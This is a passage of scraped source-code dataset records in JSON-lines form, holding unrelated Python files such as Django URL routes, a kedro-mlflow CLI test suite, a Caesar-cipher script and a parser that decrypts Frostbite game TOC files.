color;\n\n\n #moves the snake, start and deathIndex should not require overlapping from\n #the last index in the LED array to the 0th.\n def update():\n for i in self.lightDict.keys():\n if i+self.velocity >= self.deathIndex:\n self.lightDict[i+self.velocity] = self.lightDict[i]\n del self.lightDict[i]\n\n def get_light_Dict():\n return self.lightDict\n","sub_path":"lib/renderers/teensy/light_effect_manager.py","file_name":"light_effect_manager.py","file_ext":"py","file_size_in_byte":3905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"108766017","text":"from sympy import binomial\nfrom itertools import product\n\nif __name__ == \"__main__\":\n n_upper = int(input())\n binomial_lower = int(input())\n \n counter = len({\n (n,r) for n,r in product(range(n_upper + 1), repeat=2) \n if binomial(n,r) > binomial_lower \n })\n \n print(counter)","sub_path":"51-60/p53.py","file_name":"p53.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"637594222","text":"from django.contrib import admin\n\n# Register your models here.\nfrom .models import Profile\n\n\n@admin.register(Profile)\nclass AdminProfile(admin.ModelAdmin):\n list_display = (\n 'usuario',\n 'clave_rh',\n 'clave_jde',\n 'foto',\n 'fecha_nacimiento',\n )\n","sub_path":"seguridad/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"78081346","text":"from django.urls import path, re_path\nfrom app import views\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('signup/', views.signup, name='signup'),\n path('signin/', views.signin, name='signin'),\n path('disconnect/', views.disconnect, name=\"disconnect\"),\n path('contact/', views.contact, name='contact'),\n re_path(r'^gig_detail/(?P[0-9]+)/$', views.gig_detail, name='gig_detail'),\n path('gig_mygigs/', views.gig_mygigs, name='gig_mygigs'),\n path('gig_create/', views.gig_create, name=\"gig_create\"),\n re_path(r'^gig_edit/(?P[0-9]+)/$', views.gig_edit, name='gig_edit'),\n re_path(r'^gig_search/$', views.gig_search, name='gig_search'),\n re_path(r'^profile/(?P\\w+)/$', views.profile, name='profile'),\n path('account/', views.account, name='account'),\n re_path(r'^personal_info/(?P\\w+)/$', views.personal_info, name='personal_info'),\n\n path('ajax/load-cities/', views.load_cities, name='ajax_load_cities'), # AJAX\n path('ajax/load-localities/', views.load_localities, name='ajax_load_localities'), # AJAX\n path('ajax/load-areas/', views.load_areas, name='ajax_load_areas'), # AJAX\n path('ajax/load-subareas/', views.load_subareas, name='ajax_load_subareas'), # AJAX\n]","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"130200057","text":"import xlrd\nimport os\nimport shutil\nimport pandas as pd\nimport numpy as np\nfrom utils import quadratic_weighted_kappa, kappa_confusion_matrix, AverageMeter\nfrom sklearn.metrics import confusion_matrix\nimport argparse\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='kappa3_ratio')\n parser.add_argument('--csvfile', required=True)\n parser.add_argument('--error_output', required=True)\n return parser.parse_args()\n\nargs = parse_args()\n\nroot = '/media/weidong/weidong/12.15质检图片'\nxls_file = os.path.join(root, '3_分级2017.05.01_2017.12.01.xls')\n# pred_csv = os.path.join(root, '3/Save/result.csv')\npred_csv = os.path.join(root, args.csvfile)\nprint(xls_file)\n\ndata = xlrd.open_workbook(xls_file)\n\ntable = data.sheets()[0]\n\nnrows = table.nrows\n\ndict_gt = {}\n\nfor i in range(1, nrows):\n try:\n row = table.row_values(i)\n name = str(int(row[0]))\n level = str(int(row[4]))\n dict_gt[name+'.jpg'] = int(row[4])\n except:\n continue\n\ndict_pred = {}\n\ndf = pd.DataFrame.from_csv(pred_csv)\nfor index, row in df.iterrows():\n dict_pred[row['image']] = row['dr_level']\n\nlist_gt = []\nlist_pred = []\n\n# make dir\nroot_error = os.path.join(root, args.error_output)\nos.makedirs(root_error, exist_ok=True)\nfor i in range(5):\n for j in range(5):\n tmp_dir = os.path.join(root_error, 'gt_{}_pred_{}'.format(i, j))\n os.makedirs(tmp_dir, exist_ok=True)\n\n\nfor key in dict_pred.keys():\n list_gt.append(dict_gt[key])\n list_pred.append(dict_pred[key])\n if (dict_gt[key] != dict_pred[key]):\n src_file = os.path.join(root, '3/Save/{}'.format(key))\n dst_file = os.path.join(root_error, 'gt_{}_pred_{}'.format(dict_gt[key], dict_pred[key]))\n shutil.copy(src_file, dst_file)\n print('copy from {} to {}'.format(src_file, dst_file))\n\nprint(len(list_pred))\nprint(len(list_gt))\n\nnp_gt = np.array(list_gt)\nnp_pred = np.array(list_pred)\n\ndr_kappa = quadratic_weighted_kappa(np_gt, np_pred)\n\ndr_confusion_matrix = str(confusion_matrix(np_gt, np_pred))\n\nout_file = os.path.join(root, 'kappa3.txt')\n\nwith open(out_file, 'w') as f:\n f.write('====>kappa: {}\\n'.format(dr_kappa))\n f.write('===> Confusion Matrix:\\n')\n f.write(dr_confusion_matrix)\n f.write('\\n\\n')\n","sub_path":"tmp1/kappa3_ratio.py","file_name":"kappa3_ratio.py","file_ext":"py","file_size_in_byte":2260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"24604083","text":"import sys\nfrom optparse import OptionParser\n\n\ndef simpleParseCallbackKeywords(option, opt, value, parser):\n setattr(parser.values, option.dest, value.split(','))\n\n\ndef simpleParseOptions():\n parser = OptionParser()\n parser.add_option('-q', '--quiet', action='store_false',\n dest=\"verbose\", default=True)\n parser.add_option('-j', action='store_true', dest=\"join\", default=False)\n parser.add_option('-k', '--keywords', action=\"callback\", type=\"string\",\n dest=\"keywords\", callback=simpleParseCallbackKeywords)\n return parser\n\n\ndef simpleParseInput(args):\n parser = simpleParseOptions()\n (options, args) = parser.parse_args()\n print(\"Verbose: {verbose}\".format(verbose=options.verbose))\n print(\"Options: {join}\".format(join=options.join))\n print(\"Keywords: {keywords}\".format(keywords=options.keywords))\n\nsimpleParseInput(sys.argv)\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"258812182","text":"import Movie\nimport requests, base64, hashlib, json\nfrom datetime import date\nfrom settings import *\n\n\nclass Person:\n \n\n def __init__(self, code):\n self.parameters = code\n self.code = code[\"code\"]\n \n if \"picture\" in code:\n self.picture = code[\"picture\"][\"href\"]\n else:\n self.picture = \"\"\n\n if \"name\" in code:\n self.name = code[\"name\"]\n else:\n self.name = \"\"\n\n if \"gender\" in code:\n if code[\"gender\"] == 2:\n self.gender = \"woman\"\n else:\n self.gender = \"man\"\n else:\n self.gender = \"\"\n\n if \"birthDate\" in code:\n d = datetime.strptime(code[\"birthDate\"], '%Y-%m-%d')\n self.birthDate = d.strftime('%d/%m/%Y')\n else:\n self.birthDate = \"\"\n\n if \"nationality\" in code:\n self.nationality = code[\"nationality\"][0][\"$\"]\n else:\n self.nationality = \"\"\n\n if \"realName\" in code:\n self.realName = code[\"realName\"]\n else:\n self.realName = \"\"\n\n if \"link\" in code:\n self.link = code[\"link\"][0][\"href\"]\n else:\n self.link = \"\"\n \n if \"activity\" in code:\n self.activity = []\n for a in code[\"activity\"]:\n self.activity.append(a[\"$\"])\n else:\n self.activity = []\n\n \n def __unicode__(self):\n return self.realName\n\n\n def getFilmography(self, profile = DEFAULT_PROFILE):\n \n qry = str(self.code)\n count = \"1\"\n \n headers = {\"User-Agent\":\"Dalvik/1.6.0 (Linux; U; Android 4.2.2; Nexus 4 Build/JDQ39E)\"}\n url = \"http://api.allocine.fr/rest/v3/filmography\"\n sed = str(date.today().strftime(\"%Y%m%d\"))\n sig = hashlib.sha1(SECRET_KEY + \"partner=\"+PARTNER_CODE+\"&code=\"+qry.replace(\" \",\"+\")+\"&format=json&filter=person&count=\" + str(count) + '&sed=' + sed).digest().encode(\"base64\").replace(\"\\n\",\"\").replace(\"+\", \"%2B\").replace(\"=\", \"%3D\").replace(\"/\", \"%2F\")\n url += '?' + \"partner=\"+PARTNER_CODE+\"&code=\"+qry.replace(\" \",\"+\") + \"&format=json&filter=person&count=\" + str(count) + '&sed=' + sed + '&sig=' + sig\n \n e = requests.get(url, headers=headers).text\n d = json.loads(e)[\"person\"][\"participation\"]\n \n filmography = []\n for i in d:\n movie = {}\n if \"movie\" in i:\n \n movie[\"title\"] = i[\"movie\"][\"title\"]\n movie[\"productionYear\"] = i[\"movie\"][\"productionYear\"]\n movie[\"activity\"] = i[\"activity\"][\"$\"]\n \n if \"role\" in i:\n movie[\"role\"] = i[\"role\"]\n else:\n movie[\"role\"] = \"\"\n \n filmography.append(movie)\n \n return filmography\n \n","sub_path":"allocine/Person.py","file_name":"Person.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"199840751","text":"import os\n\n\ndef excuteLtp(cmdline, inputFoler, outputFolder):\n n = 0\n for parents, folders, filenames in os.walk(inputFoler):\n for filename in filenames:\n inputFile = os.path.join(inputFoler, filename)\n outputFile = os.path.join(outputFolder, filename)\n if os.path.exists(outputFile)!=True:\n n+=1\n\n newCmdLine = cmdline + \" -in \" + inputFile + \" -out \" + outputFile\n os.system(newCmdLine)\n\n\n\nif __name__ == '__main__':\n\n niuParserPath = r\"H://NiuParser-v1.3.0-win//bin\"\n model_exe = \"//NiuParser-v1.3.0-mt-win.exe\"\n model_action = [ \" --POS \",\" --CP \", \" --DP \"]\n model_config = \" -c niuparser.config \"\n\n os.chdir(niuParserPath)\n\n\n # year = str(2015)\n # niuparseFolder = os.path.join(\"/home/nankang/Desktop/nianbao\", \"niuparser_\" + year)\n # if os.path.exists(niuparseFolder):\n # print(\"exists\")\n # else:\n # os.makedirs(niuparseFolder)\n\n # version = \"version_\" + \"3\"\n # fenlei = \"v3_1\"\n # input_pos_folder = os.path.join(\"/home/nankang/Desktop/cws\", year+\"_\"+version+\"_cws\")\n # output_cws_folder = os.path.join(niuparseFolder, version + \"_ws\",fenlei)\n # input_pos_folder = output_cws_folder\n # output_pos_folder = os.path.join(niuparseFolder, version + \"_pos\")\n # input_cp_folder = input_pos_folder\n # output_cp_folder = os.path.join(niuparseFolder, version + \"_cp\")\n # input_dp_folder = input_pos_folder\n # output_dp_folder = os.path.join(niuparseFolder, version + \"_dp\")\n\n # if os.path.exists(output_cws_folder):\n # print(\"exists\")\n # else:\n # os.mkdir(output_cws_folder)\n # if os.path.exists(output_pos_folder):\n # print(\"exists\")\n # else:\n # os.makedirs(output_pos_folder)\n # if os.path.exists(output_cp_folder):\n # print(\"exists\")\n # else:\n # os.makedirs(output_cp_folder)\n # if os.path.exists(output_dp_folder):\n # print(\"exists\")\n # else:\n # os.makedirs(output_dp_folder)\n\n # cmdline = model_exe+threads_num+last_stage\n # cmdline_cws = \"/home/hadoop1/desktop/NiuParser-v1.3.0-linux/bin/\"+model_exe + model_action[0] + model_config\n cmdline_pos = niuParserPath+model_exe + model_action[0] + model_config\n cmdline_cp = niuParserPath+model_exe + model_action[1] + model_config\n cmdline_dp = niuParserPath+model_exe + model_action[2] + model_config\n # excuteLtp(cmdline_cws, input_cws_folder, output_cws_folder)\n # excuteLtp(cmdline_pos, input_pos_folder, output_pos_folder)\n # excuteLtp(cmdline_cp, input_cp_folder, output_cp_folder)\n # excuteLtp(cmdline_dp, input_dp_folder, output_dp_folder)\n # newCmdLine = cmdline + \" -in \" + inputFile + \" -out \" + outputFile\n inputFile='H://hanyu//hanyu_output_pos.txt'\n # file = open(inputFile,'r')\n # s = file.read()\n # print(s)\n # file.close()\n outputFile='H://hanyu//hanyu_output_dp.txt'\n # if os.path.exists(outputFile):\n # print(\"exists\")\n # else:\n # os.makedirs(outputFile)\n # excuteLtp(cmdline_cp, inputFile, outputFile)\n newCmdLine=cmdline_dp+\" -in \" + inputFile + \" -out \" + outputFile\n os.system(newCmdLine)\n","sub_path":"NiuParse-linux.py","file_name":"NiuParse-linux.py","file_ext":"py","file_size_in_byte":3186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"165175363","text":"from pyats.utils.fileutils import FileUtils\nfrom pyats.aetest import Testcase, test\n\n\nclass Smoke(Testcase):\n\n @test\n def copy_from(self, env):\n with FileUtils(testbed=env) as futils:\n futils.copyfile(\n source='scp://rrr//home/adminaccount/slavik/3.txt',\n destination='/home/jsakhno/github/pyatsTraining/homeworks/yaroslav_sakhno/hw03')\n\n @test\n def copy_to(self,env):\n with FileUtils(testbed=env) as futils:\n futils.copyfile(\n source='/home/jsakhno/github/pyatsTraining/homeworks/yaroslav_sakhno/hw03/2.txt',\n destination='scp://rrr//home/adminaccount/slavik')\n","sub_path":"homeworks/yaroslav_sakhno/hw03/test_copy.py","file_name":"test_copy.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"310277346","text":"import string\n\n\ndef main():\n try:\n input_file_name = input('Input file name: ')\n output_file_name = input('Output file name: ')\n mode = int(input('1 - encrypt\\n2 - decrypt\\nMake your choice: '))\n key = get_key(mode, int(input('Input key: ')))\n original_str = read_from_file(input_file_name)\n modified_str = encrypt_string(original_str, key)\n write_to_file(output_file_name, modified_str)\n except FileNotFoundError:\n print('There is no such file!')\n except ValueError:\n print('Illegal key or mode format')\n\n\ndef read_from_file(input_file_name):\n with open(input_file_name, 'r') as r:\n input_str = r.read()\n return input_str\n\n\ndef write_to_file(output_file_name, out_str):\n with open(output_file_name, 'w') as w:\n w.write(out_str)\n\n\ndef get_key(mode, key_of_encryption):\n if mode == 2:\n key_of_encryption = -key_of_encryption\n elif mode != 1:\n raise ValueError('Illegal mode parameter...')\n return key_of_encryption\n\n\ndef encrypt_string(input_string, key):\n a = 'абвгдеёжзийклмнопрстуфхцчшщъыьэюя'\n symbols = a + \" \" + a.upper() + string.ascii_letters + string.digits + string.punctuation\n encrypted_string, length_symbols = \"\", len(symbols)\n for input_char in input_string:\n found_char_index = symbols.find(input_char)\n if found_char_index == -1:\n encrypted_string += input_char\n else:\n new_index = (found_char_index + key) % length_symbols\n encrypted_string += symbols[new_index]\n\n return encrypted_string\n","sub_path":"Encrypt_String.py","file_name":"Encrypt_String.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"319062483","text":"import random\nimport logging\n\nfrom axilent import handlers, dicts\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass DictAxiTest(object):\n '''\n Wraps a test with prepare and check methods with a test that\n exposes make_input_data and check_output_data methods.\n '''\n\n def __init__(self, axi_test, terminate_early=False):\n self.axi_test = axi_test\n self.handler = handlers.DictCommandHandler()\n self.terminate_early = terminate_early\n\n def make_input_data(self):\n input_data = [{\n 'reset': 1,\n 'm2s': dicts.make_empty_axi4lite_m2s_dict(),\n 's2m': dicts.make_empty_axi4lite_s2m_dict(),\n }]\n self.axi_test.prepare(self.handler)\n m2s = self.handler.make_command_dicts()\n input_data += [{\n 'reset': 0,\n 'm2s': d,\n 's2m': dicts.make_empty_axi4lite_s2m_dict(),\n } for d in m2s]\n if self.terminate_early:\n input_data = input_data[:random.randint(1, len(input_data))]\n return input_data\n\n def check_output_data(self, input_data, output_data):\n if not self.terminate_early:\n response_dicts = [d['s2m'] for d in output_data[1:]]\n self.handler.consume_response_dicts(response_dicts)\n self.axi_test.check()\n","sub_path":"axilent/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"604432332","text":"import re\nimport subprocess # noqa: F401\n\nimport pytest\nimport yaml\nfrom click.testing import CliRunner\nfrom kedro.framework.cli.cli import info\nfrom kedro.framework.session import KedroSession\nfrom kedro.framework.startup import bootstrap_project\n\nfrom kedro_mlflow.framework.cli.cli import init as cli_init\nfrom kedro_mlflow.framework.cli.cli import mlflow_commands as cli_mlflow\nfrom kedro_mlflow.framework.cli.cli import ui as cli_ui\nfrom kedro_mlflow.framework.context import get_mlflow_config\n\n\ndef extract_cmd_from_help(msg):\n # [\\s\\S] is used instead of \".\" to match any character including new lines\n cmd_txt = re.search((r\"(?<=Commands:)([\\s\\S]+)$\"), msg).group(1)\n cmd_list_detailed = cmd_txt.split(\"\\n\")\n cmd_list = [\n cmd.strip().split(\" \")[0] for cmd in cmd_list_detailed if cmd.strip() != \"\"\n ]\n return cmd_list\n\n\ndef test_cli_global_discovered(monkeypatch, tmp_path):\n monkeypatch.chdir(tmp_path)\n cli_runner = CliRunner()\n result = cli_runner.invoke(info)\n\n assert result.exit_code == 0\n assert \"kedro_mlflow\" in result.output\n\n\n# TODO: add a test to check if \"kedro mlflow\" commmand is discovered\n# I can't make it work with cli.invoke\n# because discovery mechanisme is linked to setup.py\n\n\n## This command is temporarlily deactivated beacuse of a bug in kedro==0.17.3, see: https://github.com/Galileo-Galilei/kedro-mlflow/issues/193\n# def test_mlflow_commands_outside_kedro_project(monkeypatch, tmp_path):\n# monkeypatch.chdir(tmp_path)\n# cli_runner = CliRunner()\n# result = cli_runner.invoke(cli_mlflow)\n# assert {\"new\"} == set(extract_cmd_from_help(result.output))\n\n\ndef test_mlflow_commands_inside_kedro_project(monkeypatch, kedro_project):\n monkeypatch.chdir(kedro_project)\n # launch the command to initialize the project\n cli_runner = CliRunner()\n result = cli_runner.invoke(cli_mlflow)\n assert {\"init\", \"ui\"} == set(extract_cmd_from_help(result.output))\n assert \"You have not updated your template yet\" not in result.output\n\n\ndef test_cli_init(monkeypatch, kedro_project):\n # \"kedro_project\" is a pytest.fixture declared in conftest\n monkeypatch.chdir(kedro_project)\n cli_runner = CliRunner()\n result = cli_runner.invoke(cli_init)\n\n # FIRST TEST:\n # the command should have executed propery\n assert result.exit_code == 0\n\n # check mlflow.yml file\n assert \"'conf/local/mlflow.yml' successfully updated.\" in result.output\n assert (kedro_project / \"conf\" / \"local\" / \"mlflow.yml\").is_file()\n\n\ndef test_cli_init_existing_config(monkeypatch, kedro_project_with_mlflow_conf):\n # \"kedro_project\" is a pytest.fixture declared in conftest\n cli_runner = CliRunner()\n monkeypatch.chdir(kedro_project_with_mlflow_conf)\n bootstrap_project(kedro_project_with_mlflow_conf)\n\n with KedroSession.create(\n \"fake_project\", project_path=kedro_project_with_mlflow_conf\n ) as session:\n context = session.load_context()\n # emulate first call by writing a mlflow.yml file\n yaml_str = yaml.dump(dict(mlflow_tracking_uri=\"toto\"))\n (\n kedro_project_with_mlflow_conf / context.CONF_ROOT / \"local\" / \"mlflow.yml\"\n ).write_text(yaml_str)\n\n result = cli_runner.invoke(cli_init)\n\n # check an error message is raised\n assert \"A 'mlflow.yml' already exists\" in result.output\n\n # check the file remains unmodified\n assert get_mlflow_config().mlflow_tracking_uri.endswith(\"toto\")\n\n\ndef test_cli_init_existing_config_force_option(monkeypatch, kedro_project):\n # \"kedro_project\" is a pytest.fixture declared in conftest\n monkeypatch.chdir(kedro_project)\n cli_runner = CliRunner()\n\n bootstrap_project(kedro_project)\n with KedroSession.create(project_path=kedro_project) as session:\n context = session.load_context()\n\n # emulate first call by writing a mlflow.yml file\n yaml_str = yaml.dump(dict(mlflow_tracking_uri=\"toto\"))\n (kedro_project / context.CONF_ROOT / \"local\" / \"mlflow.yml\").write_text(\n yaml_str\n )\n\n result = cli_runner.invoke(cli_init, args=\"--force\")\n\n # check an error message is raised\n assert \"successfully updated\" in result.output\n\n # check the file remains unmodified\n assert get_mlflow_config().mlflow_tracking_uri.endswith(\"mlruns\")\n\n\n@pytest.mark.parametrize(\n \"env\",\n [\"base\", \"local\"],\n)\ndef test_cli_init_with_env(monkeypatch, kedro_project, env):\n # \"kedro_project\" is a pytest.fixture declared in conftest\n monkeypatch.chdir(kedro_project)\n cli_runner = CliRunner()\n result = cli_runner.invoke(cli_init, f\"--env {env}\")\n\n # FIRST TEST:\n # the command should have executed propery\n assert result.exit_code == 0\n\n # check mlflow.yml file\n assert f\"'conf/{env}/mlflow.yml' successfully updated.\" in result.output\n assert (kedro_project / \"conf\" / env / \"mlflow.yml\").is_file()\n\n\n@pytest.mark.parametrize(\n \"env\",\n [\"debug\"],\n)\ndef test_cli_init_with_wrong_env(monkeypatch, kedro_project, env):\n # \"kedro_project\" is a pytest.fixture declared in conftest\n monkeypatch.chdir(kedro_project)\n cli_runner = CliRunner()\n result = cli_runner.invoke(cli_init, f\"--env {env}\")\n\n # A warning message should appear\n assert f\"No env '{env}' found\" in result.output\n\n\n# TODO : This is a fake test. add a test to see if ui is properly up\n# I tried mimicking mlflow_cli with mock but did not achieve desired result\n# other solution is to use pytest-xprocess\n# TODO: create an initlaized_kedro_project fixture with a global scope\ndef test_ui_is_up(monkeypatch, mocker, kedro_project_with_mlflow_conf):\n\n monkeypatch.chdir(kedro_project_with_mlflow_conf)\n cli_runner = CliRunner()\n\n # This does not test anything : the goal is to check whether it raises an error\n ui_mocker = mocker.patch(\n \"subprocess.call\"\n ) # make the test succeed, but no a real test\n cli_runner.invoke(cli_ui)\n ui_mocker.assert_called_once_with(\n [\n \"mlflow\",\n \"ui\",\n \"--backend-store-uri\",\n (kedro_project_with_mlflow_conf / \"mlruns\").as_uri(),\n \"--host\",\n \"127.0.0.1\",\n \"--port\",\n \"5000\",\n ]\n )\n\n # OTHER ATTEMPT:\n # try:\n # import threading\n # thread = threading.Thread(target=subprocess.call, args=([\"kedro\", \"mlflow\", \"sqf\"],))\n # thread.start()\n # except Exception as err:\n # raise err\n # print(thread)\n # assert thread.is_alive()\n\n\ndef test_ui_overwrite_conf_at_runtime(\n monkeypatch, mocker, kedro_project_with_mlflow_conf\n):\n\n monkeypatch.chdir(kedro_project_with_mlflow_conf)\n cli_runner = CliRunner()\n\n # This does not test anything : the goal is to check whether it raises an error\n ui_mocker = mocker.patch(\n \"subprocess.call\"\n ) # make the test succeed, but no a real test\n cli_runner.invoke(cli_ui, [\"--host\", \"0.0.0.0\", \"--port\", \"5001\"])\n ui_mocker.assert_called_once_with(\n [\n \"mlflow\",\n \"ui\",\n \"--backend-store-uri\",\n (kedro_project_with_mlflow_conf / \"mlruns\").as_uri(),\n \"--host\",\n \"0.0.0.0\",\n \"--port\",\n \"5001\",\n ]\n )\n","sub_path":"tests/framework/cli/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":7287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"39546860","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nCreated on 2015-03-30\n:author: Andreas Kaiser (disko@binary-punks.com)\n\"\"\"\n\nimport datetime\nimport uuid\n\nfrom kotti.resources import File\nfrom pyramid.i18n import TranslationStringFactory\nfrom pyramid.renderers import JSON\nfrom pyramid.renderers import JSONP\n\n_ = TranslationStringFactory('kotti_conference')\n\n\ndef datetime_adapter(obj, request):\n \"\"\" Convert date or datetime into a string object that can be used in JSON.\n The best format for this is ISO 8601, as this can be parsed natively by all\n Javascript engines.\n\n :param obj: date or datetime to be converted to string\n :type obj: :class:`datetime.date` or :class:`datetime.datetime`\n\n :param request: current request\n :type request: :class:`pyramid.request.Request`\n\n :result: ISO formatted date(time)\n :rtype: str\n \"\"\"\n\n return obj.isoformat()\n\n\ndef uuid_adapter(obj, request):\n \"\"\" Convert uuid into a string that can be used in JSON (JSON / Javascript\n don't have a native UUID type).\n\n :param obj: UUID converted to string\n :type obj: :class:`uuid.UUID`\n\n :param request: current request\n :type request: :class:`pyramid.request.Request`\n\n :result: UUID string (e.g. 5f2f5890-d720-11e4-85d4-a757eac847f5)\n :rtype: str\n \"\"\"\n\n return str(obj)\n\n\ndef kotti_configure(settings):\n \"\"\" Add a line like this to you .ini file::\n\n kotti.configurators =\n kotti_conference.kotti_configure\n\n to enable the ``kotti_conference`` add-on.\n\n :param settings: Kotti configuration dictionary.\n :type settings: dict\n \"\"\"\n\n settings['pyramid.includes'] += ' kotti_conference'\n\n settings['kotti.available_types'] += \\\n ' kotti_conference.resources.Conference' \\\n ' kotti_conference.resources.Speaker' \\\n ' kotti_conference.resources.Talk'\n\n settings['kotti.fanstatic.view_needed'] += ' kotti_conference.fanstatic.css_and_js'\n\n File.type_info.addable_to.append('Conference')\n\n\ndef includeme(config):\n \"\"\" Don't add this to your ``pyramid_includes``, but add the\n ``kotti_configure`` above to your ``kotti.configurators`` instead.\n\n :param config: Pyramid configurator object.\n :type config: :class:`pyramid.config.Configurator`\n \"\"\"\n\n config.add_translation_dirs('kotti_conference:locale')\n config.add_static_view('static-kotti_conference', 'kotti_conference:static')\n\n # We're extending Pyramid's JSON renderer with some adapters to make it\n # render date, datetime and uuid object without having to convert them\n # every single time explicitely ourselves. Instead the conversion is now\n # done implicitely by Pyramid and the adapter functions above. This is\n # especially convenient in combination with ``__json__`` methods on the\n # resource classes (or content types).\n json_renderer = JSON(indent=4)\n json_renderer.add_adapter(datetime.datetime, datetime_adapter)\n json_renderer.add_adapter(datetime.date, datetime_adapter)\n json_renderer.add_adapter(uuid.UUID, uuid_adapter)\n config.add_renderer('json', json_renderer)\n\n # Same for JSONP (http://en.wikipedia.org/wiki/JSONP).\n jsonp_renderer = JSONP(indent=4)\n jsonp_renderer.add_adapter(datetime.datetime, datetime_adapter)\n jsonp_renderer.add_adapter(datetime.date, datetime_adapter)\n jsonp_renderer.add_adapter(uuid.UUID, uuid_adapter)\n config.add_renderer('jsonp', jsonp_renderer)\n\n config.scan(__name__)\n","sub_path":"kotti_conference/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"94012382","text":"#This is essentially a binary JSON type container.\n#Each entry can hold a value of a specic type or more entries embedded into it.\n#Values are always little endian.\nfrom struct import unpack\nimport io\nfrom collections import OrderedDict\n\ndef unXor(path):\n \"\"\"Take a filename (usually toc or cat), decrypt the file if necessary, close it and return the unencrypted data in a memory stream.\n\n As toc files are ~300 kB at most, make a memory stream even if the file wasn't encrypted in the first place (to get rid of the physical file handle).\"\"\"\n\n f=open(path,\"rb\")\n if path[-4:]==\".toc\":\n f=unXorMEA(f) #Detect and decrypt Mass Effect: Andromeda.\n\n magic=f.read(4)\n if magic in (b\"\\x00\\xD1\\xCE\\x00\"): #the file is XOR encrypted and has a signature\n f.seek(296) #skip the signature\n key=[f.read(1)[0]^0x7b for i in range(260)] #bytes 257 258 259 are not used\n encryptedData=f.read()\n size=len(encryptedData)\n data=bytearray(size) #initalize the buffer\n for i in range(size):\n data[i]=key[i%257]^encryptedData[i]\n elif magic in (b\"\\x00\\xD1\\xCE\\x01\",b\"\\x00\\xD1\\xCE\\x03\"): #the file has a signature, but an empty key; it's not encrypted\n f.seek(556) #skip signature + skip empty key\n data=f.read()\n else: #the file is not encrypted; no key + no signature\n f.seek(0)\n data=f.read()\n f.close()\n\n return io.BytesIO(data)\n\ndef unXorMEA(f):\n f.seek(0,2)\n size=f.tell()\n f.seek(-32,2)\n signature=f.read(32)\n if signature!=b\"@e!adnXd$^!rfOsrDyIrI!xVgHeA!6Vc\":\n f.seek(0)\n return f\n\n #Mass Effect: Andromeda uses custom encryption on TOC files.\n f.seek(-36,2)\n headerSize=unpackLE(\"I\",f.read(4))[0]\n f.seek(0)\n encryptedData=f.read(size-headerSize)\n dataLen=len(encryptedData)\n data=bytearray(dataLen)\n key=encryptedData[0]\n for i in range(dataLen):\n data[i]=encryptedData[i]^key\n key=((encryptedData[0]^encryptedData[i])-(i%256))&0xFF\n\n f.close()\n return io.BytesIO(data)\n\n\n\ndef decode7bit(f):\n \"\"\"Reads the next few bytes in a file as LEB128/7bit encoding and returns an integer\"\"\"\n result,shift = 0,0\n while 1:\n byte=f.read(1)[0]\n result|=(byte&0x7f)<>7==0: return result\n shift+=7\n\ndef readNullTerminatedString(f):\n result=b\"\"\n while 1:\n byte=f.read(1)\n if byte==b\"\\x00\": break\n result+=byte\n\n return result.decode()\n\ndef unpackLE(typ,data): return unpack(\"<\"+typ,data)\ndef unpackBE(typ,data): return unpack(\">\"+typ,data)\n\nclass Guid:\n def __init__(self,f,bigEndian):\n #The first 3 elements are native endian and the last one is big endian.\n unpacker=unpackBE if bigEndian else unpackLE\n data=f.read(16)\n num1,num2,num3=unpacker(\"IHH\",data[0:8])\n num4=unpackBE(\"Q\",data[8:16])[0]\n self.val=num1,num2,num3,num4\n def frombytes(data,bigEndian):\n #Hack to init Guid from memory data.\n f=io.BytesIO(data)\n return Guid(f,bigEndian)\n def __eq__(self,other):\n return self.val==other.val\n def __ne__(self,other):\n return self.val!=other.val\n def __hash__(self):\n return hash(self.val)\n\n def format(self):\n return \"%08x-%04x-%04x-%04x-%012x\" % (self.val[0],self.val[1],self.val[2],\n (self.val[3]>>48)&0xFFFF,self.val[3]&0x0000FFFFFFFFFFFF)\n def isNull(self):\n return self.val==(0,0,0,0)\n\nclass DbObjectId:\n def __init__(self,f):\n self.id=f.read(12)\n\nclass DbTimestamp:\n def __init__(self,f):\n self.timeData=f.read(8)\n\nclass DbRecordId:\n def __init__(self,f):\n self.extentId, self.pageId, self.slotId = unpackLE(\"HHH\",f.read(6))\n\nclass Vector4D:\n def __init__(self,f):\n self.x, self.y, self.z, self.w = unpackLE(\"ffff\",f.read(16))\n\nclass Matrix4x4:\n def __init__(self,f):\n self.vecs=list()\n for i in range(4):\n self.vecs.append(Vector4D(f))\n\nclass DbTimespan:\n def 